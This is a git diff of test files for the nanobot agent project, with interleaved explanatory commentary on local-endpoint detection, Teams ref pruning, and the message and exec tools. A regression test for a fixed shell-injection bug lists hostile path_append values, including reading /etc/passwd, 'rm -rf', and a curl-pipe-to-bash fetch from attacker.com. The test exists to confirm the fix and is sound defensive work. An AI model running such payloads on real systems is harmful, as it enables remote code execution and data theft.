+        spec.default_api_base = "https://api.openai.com/v1"
+        provider = OpenAICompatProvider(
+            api_key="test", api_base=None, spec=spec,
+        )
+        pool = provider._client._client._transport._pool
+        # Default httpx keepalive is 5.0s
+        assert pool._keepalive_expiry == 5.0
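The detection cases above fully characterise _is_local_endpoint's observable behaviour: a spec flag short-circuits, otherwise the URL's host is checked for well-known local hostnames, loopback, and RFC 1918 private ranges, tolerating scheme-less URLs and trailing slashes while rejecting substring look-alikes. One plausible shape for the helper that satisfies every case, offered as an assumption since the real body in openai_compat_provider.py may differ in detail:

    import ipaddress
    from urllib.parse import urlsplit

    _LOCAL_HOSTNAMES = {"localhost", "host.docker.internal"}

    def _is_local_endpoint(spec, api_base) -> bool:
        # spec.is_local takes precedence even for public-looking URLs.
        if spec is not None and getattr(spec, "is_local", False):
            return True
        if not api_base:
            return False
        url = api_base if "://" in api_base else f"http://{api_base}"  # scheme-less URLs still parse
        host = (urlsplit(url).hostname or "").lower()
        if host in _LOCAL_HOSTNAMES:
            return True
        try:
            ip = ipaddress.ip_address(host)  # rejects plain hostnames like api.openai.com
        except ValueError:
            return False
        return ip.is_private or ip.is_loopback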
"https://notlocalhost.example/v1") is False + + def test_public_hostname_containing_private_ip_prefix_is_not_local(self): + assert _is_local_endpoint(None, "https://api10.example.com/v1") is False + + def test_url_without_scheme(self): + assert _is_local_endpoint(None, "192.168.1.1:8080/v1") is True + + +class TestLocalKeepaliveConfig: + """Verify that local endpoints get keepalive_expiry=0.""" + + def test_local_spec_disables_keepalive(self): + spec = _make_spec(is_local=True) + spec.env_key = "" + spec.default_api_base = "http://localhost:11434/v1" + provider = OpenAICompatProvider( + api_key="test", api_base="http://localhost:11434/v1", spec=spec, + ) + pool = provider._client._client._transport._pool + assert pool._keepalive_expiry == 0 + + def test_lan_ip_disables_keepalive(self): + """A generic 'openai' spec with a LAN IP should still disable keepalive.""" + spec = _make_spec(is_local=False) + spec.env_key = "" + spec.default_api_base = None + provider = OpenAICompatProvider( + api_key="test", api_base="http://192.168.8.188:1234/v1", spec=spec, + ) + pool = provider._client._client._transport._pool + assert pool._keepalive_expiry == 0 + + def test_cloud_keeps_default_keepalive(self): + spec = _make_spec(is_local=False) + spec.env_key = "" + spec.default_api_base = "https://api.openai.com/v1" + provider = OpenAICompatProvider( + api_key="test", api_base=None, spec=spec, + ) + pool = provider._client._client._transport._pool + # Default httpx keepalive is 5.0s + assert pool._keepalive_expiry == 5.0 diff --git a/tests/providers/test_stepfun_reasoning.py b/tests/providers/test_stepfun_reasoning.py index 05e5416d4..8d7cbdb91 100644 --- a/tests/providers/test_stepfun_reasoning.py +++ b/tests/providers/test_stepfun_reasoning.py @@ -9,6 +9,17 @@ from types import SimpleNamespace from unittest.mock import patch from nanobot.providers.openai_compat_provider import OpenAICompatProvider +from nanobot.providers.registry import ProviderSpec + +_STEPFUN_SPEC = ProviderSpec( + name="stepfun", + keywords=("stepfun", "step"), + env_key="STEPFUN_API_KEY", + display_name="Step Fun", + backend="openai_compat", + default_api_base="https://api.stepfun.com/v1", + reasoning_as_content=True, +) # ── _parse: dict branch ───────────────────────────────────────────────────── @@ -17,7 +28,7 @@ from nanobot.providers.openai_compat_provider import OpenAICompatProvider def test_parse_dict_stepfun_reasoning_fallback() -> None: """When content is None and reasoning exists, content falls back to reasoning.""" with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): - provider = OpenAICompatProvider() + provider = OpenAICompatProvider(spec=_STEPFUN_SPEC) response = { "choices": [{ @@ -39,7 +50,7 @@ def test_parse_dict_stepfun_reasoning_fallback() -> None: def test_parse_dict_stepfun_reasoning_priority() -> None: """reasoning_content field takes priority over reasoning when both present.""" with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): - provider = OpenAICompatProvider() + provider = OpenAICompatProvider(spec=_STEPFUN_SPEC) response = { "choices": [{ @@ -75,7 +86,7 @@ def _make_sdk_message(content, reasoning=None, reasoning_content=None): def test_parse_sdk_stepfun_reasoning_fallback() -> None: """SDK branch: content falls back to msg.reasoning when content is None.""" with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): - provider = OpenAICompatProvider() + provider = OpenAICompatProvider(spec=_STEPFUN_SPEC) msg = _make_sdk_message(content=None, reasoning="After analysis: 
diff --git a/tests/test_msteams.py b/tests/test_msteams.py
index f5597c38d..b4dcf34f2 100644
--- a/tests/test_msteams.py
+++ b/tests/test_msteams.py
@@ -1,4 +1,5 @@
 import json
+import time
 
 import pytest
 
@@ -260,6 +261,17 @@ def test_sanitize_inbound_text_keeps_normal_inline_message(make_channel):
     assert ch._sanitize_inbound_text(activity) == "normal inline message"
 
 
+def test_sanitize_inbound_text_normalizes_nbsp_entities(make_channel):
+    ch = make_channel()
+
+    activity = {
+        "text": "Hello&nbsp;from&nbsp;Teams",
+        "channelData": {},
+    }
+
+    assert ch._sanitize_inbound_text(activity) == "Hello from Teams"
+
+
 def test_sanitize_inbound_text_normalizes_reply_wrapper_without_reply_metadata(make_channel):
     ch = make_channel()
 
@@ -371,7 +383,7 @@ async def test_get_access_token_uses_configured_tenant(make_channel):
 
 
 @pytest.mark.asyncio
-async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channel):
+async def test_send_posts_to_conversation_with_reply_to_id_when_reply_in_thread_enabled(make_channel):
     ch = make_channel(replyInThread=True)
     fake_http = FakeHttpClient()
     ch._http = fake_http
@@ -387,7 +399,7 @@ async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channe
 
     assert len(fake_http.calls) == 1
     url, kwargs = fake_http.calls[0]
-    assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities/activity-1"
+    assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities"
     assert kwargs["headers"]["Authorization"] == "Bearer tok"
     assert kwargs["json"]["text"] == "Reply text"
     assert kwargs["json"]["replyToId"] == "activity-1"
@@ -551,6 +563,38 @@ async def test_start_logs_install_hint_when_pyjwt_missing(make_channel, monkeypa
     assert errors == ["PyJWT not installed. Run: pip install nanobot-ai[msteams]"]
 
 
+def test_save_refs_prunes_webchat_and_stale_refs(make_channel):
+    ch = make_channel()
+    now = time.time()
+    ch._conversation_refs = {
+        "teams-good": ConversationRef(
+            service_url="https://smba.trafficmanager.net/amer/",
+            conversation_id="teams-good",
+            conversation_type="personal",
+            updated_at=now,
+        ),
+        "webchat-bad": ConversationRef(
+            service_url="https://webchat.botframework.com/",
+            conversation_id="webchat-bad",
+            conversation_type=None,
+            updated_at=now,
+        ),
+        "teams-stale": ConversationRef(
+            service_url="https://smba.trafficmanager.net/amer/",
+            conversation_id="teams-stale",
+            conversation_type="personal",
+            updated_at=now - (31 * 24 * 60 * 60),
+        ),
+    }
+
+    ch._save_refs()
+
+    assert set(ch._conversation_refs) == {"teams-good"}
+    saved = json.loads(ch._refs_path.read_text(encoding="utf-8"))
+    assert set(saved) == {"teams-good"}
+    assert saved["teams-good"]["updated_at"] == pytest.approx(now)
+
+
 def test_msteams_default_config_includes_restart_notify_fields():
     cfg = MSTeamsChannel.default_config()
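The new _save_refs test asserts two pruning behaviours before the refs file is written: the Web Chat conversation disappears and so does the ref last updated 31 days ago. The test leaves open whether the Web Chat discriminator is the service URL or the missing conversation_type, so the sketch below is an assumption on both counts (names and cutoff are inferred from the fixture, not taken from msteams.py):

    import time

    MAX_REF_AGE_SECONDS = 30 * 24 * 60 * 60  # assumed cutoff, inferred from the 31-day stale fixture

    def prune_refs(refs: dict) -> dict:
        # Hypothetical stand-in for the filtering inside _save_refs.
        now = time.time()
        return {
            key: ref
            for key, ref in refs.items()
            if "webchat" not in ref.service_url          # could equally be: ref.conversation_type is None
            and now - ref.updated_at <= MAX_REF_AGE_SECONDS
        }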
kwargs["headers"]["Authorization"] == "Bearer tok" assert kwargs["json"]["text"] == "Reply text" assert kwargs["json"]["replyToId"] == "activity-1" @@ -551,6 +563,38 @@ async def test_start_logs_install_hint_when_pyjwt_missing(make_channel, monkeypa assert errors == ["PyJWT not installed. Run: pip install nanobot-ai[msteams]"] +def test_save_refs_prunes_webchat_and_stale_refs(make_channel): + ch = make_channel() + now = time.time() + ch._conversation_refs = { + "teams-good": ConversationRef( + service_url="https://smba.trafficmanager.net/amer/", + conversation_id="teams-good", + conversation_type="personal", + updated_at=now, + ), + "webchat-bad": ConversationRef( + service_url="https://webchat.botframework.com/", + conversation_id="webchat-bad", + conversation_type=None, + updated_at=now, + ), + "teams-stale": ConversationRef( + service_url="https://smba.trafficmanager.net/amer/", + conversation_id="teams-stale", + conversation_type="personal", + updated_at=now - (31 * 24 * 60 * 60), + ), + } + + ch._save_refs() + + assert set(ch._conversation_refs) == {"teams-good"} + saved = json.loads(ch._refs_path.read_text(encoding="utf-8")) + assert set(saved) == {"teams-good"} + assert saved["teams-good"]["updated_at"] == pytest.approx(now) + + def test_msteams_default_config_includes_restart_notify_fields(): cfg = MSTeamsChannel.default_config() diff --git a/tests/tools/test_exec_env.py b/tests/tools/test_exec_env.py index 47b2c313d..b9567f29d 100644 --- a/tests/tools/test_exec_env.py +++ b/tests/tools/test_exec_env.py @@ -74,3 +74,75 @@ async def test_exec_allowed_env_keys_missing_var_ignored(monkeypatch): tool = ExecTool(allowed_env_keys=["NONEXISTENT_VAR_12345"]) result = await tool.execute(command="printenv NONEXISTENT_VAR_12345") assert "Exit code: 1" in result + + +# --- path_append injection prevention ------------------------------------ + + +@_UNIX_ONLY +@pytest.mark.asyncio +@pytest.mark.parametrize( + "malicious_path", + [ + # semicolon — classic command separator + '/tmp/bin; echo INJECTED', + # command substitution via $() + '/tmp/bin; echo $(whoami)', + # backtick command substitution + "/tmp/bin; echo `id`", + # pipe to another command + '/tmp/bin; cat /etc/passwd', + # chained with && + '/tmp/bin && curl http://attacker.com/shell.sh | bash', + # newline injection + '/tmp/bin\necho INJECTED', + # mixed shell metacharacters + '/tmp/bin; rm -rf /tmp/test_inject_marker; echo CLEANED', + ], +) +async def test_exec_path_append_shell_metacharacters_not_executed(malicious_path, tmp_path): + """Shell metacharacters in path_append must NOT be interpreted as commands. + + Regression test for: path_append was previously concatenated into a shell + command string via f'export PATH="$PATH:{path_append}"; {command}', which + allowed shell injection. After the fix, path_append is passed through the + env dict so metacharacters are treated as literal path characters. + """ + tool = ExecTool(path_append=malicious_path) + result = await tool.execute(command="echo SAFE_OUTPUT") + + # The original command should succeed + assert "SAFE_OUTPUT" in result + + # None of the injected payloads should have produced side-effects + assert "INJECTED" not in result + assert "root:" not in result # /etc/passwd content + + +@_UNIX_ONLY +@pytest.mark.asyncio +async def test_exec_path_append_command_substitution_does_not_execute(tmp_path): + """$() in path_append must not trigger command substitution. + + We create a marker file and try to read it via $(cat ...). 
diff --git a/tests/tools/test_exec_platform.py b/tests/tools/test_exec_platform.py
index b24d01ac4..b3d7f4c18 100644
--- a/tests/tools/test_exec_platform.py
+++ b/tests/tools/test_exec_platform.py
@@ -148,23 +148,33 @@ class TestSpawnWindows:
 
 class TestPathAppendPlatform:
     @pytest.mark.asyncio
-    async def test_unix_injects_export(self):
-        """On Unix, path_append is an export statement prepended to command."""
+    async def test_unix_uses_env_var_in_fixed_export(self):
+        """On Unix, path_append must not be interpolated into shell source."""
         mock_proc = AsyncMock()
         mock_proc.communicate.return_value = (b"ok", b"")
         mock_proc.returncode = 0
 
+        captured_cmd = None
+        captured_env = {}
+
+        async def capture_spawn(cmd, cwd, env):
+            nonlocal captured_cmd
+            captured_cmd = cmd
+            captured_env.update(env)
+            return mock_proc
+
         with (
             patch("nanobot.agent.tools.shell._IS_WINDOWS", False),
-            patch.object(ExecTool, "_spawn", return_value=mock_proc) as mock_spawn,
+            patch("nanobot.agent.tools.shell.os.pathsep", ":"),
+            patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
             patch.object(ExecTool, "_guard_command", return_value=None),
         ):
-            tool = ExecTool(path_append="/opt/bin")
+            tool = ExecTool(path_append="/opt/bin; echo INJECTED")
             await tool.execute(command="ls")
 
-        spawned_cmd = mock_spawn.call_args[0][0]
-        assert 'export PATH="$PATH:/opt/bin"' in spawned_cmd
-        assert spawned_cmd.endswith("ls")
+        assert captured_cmd == 'export PATH="$PATH:$NANOBOT_PATH_APPEND"; ls'
+        assert captured_env["NANOBOT_PATH_APPEND"] == "/opt/bin; echo INJECTED"
+        assert "INJECTED" not in captured_cmd
 
     @pytest.mark.asyncio
     async def test_windows_modifies_env(self):
@@ -181,6 +191,7 @@ class TestPathAppendPlatform:
 
         with (
             patch("nanobot.agent.tools.shell._IS_WINDOWS", True),
+            patch("nanobot.agent.tools.shell.os.pathsep", ";"),
            patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
             patch.object(ExecTool, "_guard_command", return_value=None),
         ):
diff --git a/tests/tools/test_message_tool.py b/tests/tools/test_message_tool.py
index b65b5cd8d..18a881215 100644
--- a/tests/tools/test_message_tool.py
+++ b/tests/tools/test_message_tool.py
@@ -1,6 +1,7 @@
 import pytest
 
 from nanobot.agent.tools.message import MessageTool
+from nanobot.bus.events import OutboundMessage
 
 
 @pytest.mark.asyncio
@@ -29,3 +30,23 @@ async def test_message_tool_rejects_malformed_buttons(bad) -> None:
         content="hi", channel="telegram", chat_id="1", buttons=bad,
     )
     assert result == "Error: buttons must be a list of list of strings"
+
+
+@pytest.mark.asyncio
+async def test_message_tool_marks_channel_delivery_only_when_enabled() -> None:
+    sent: list[OutboundMessage] = []
+
+    async def _send(msg: OutboundMessage) -> None:
+        sent.append(msg)
+
+    tool = MessageTool(send_callback=_send)
+
+    await tool.execute(content="normal", channel="telegram", chat_id="1")
+    token = tool.set_record_channel_delivery(True)
+    try:
+        await tool.execute(content="cron", channel="telegram", chat_id="1")
+    finally:
+        tool.reset_record_channel_delivery(token)
+
+    assert sent[0].metadata == {}
+    assert sent[1].metadata == {"_record_channel_delivery": True}
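A usage note on the toggle exercised by this last test: the test wraps the proactive send in try/finally so the flag cannot leak into ordinary turns, and callers that deliver cron or heartbeat messages would presumably follow the same discipline. A hypothetical caller sketch, using only the MessageTool methods the test itself calls:

    from nanobot.agent.tools.message import MessageTool

    async def deliver_proactively(tool: MessageTool, content: str, channel: str, chat_id: str) -> None:
        # Hypothetical wrapper: mark tool-sent messages from this turn as channel deliveries,
        # and always restore the previous state, mirroring the try/finally in the test above.
        token = tool.set_record_channel_delivery(True)
        try:
            await tool.execute(content=content, channel=channel, chat_id=chat_id)
        finally:
            tool.reset_record_channel_delivery(token)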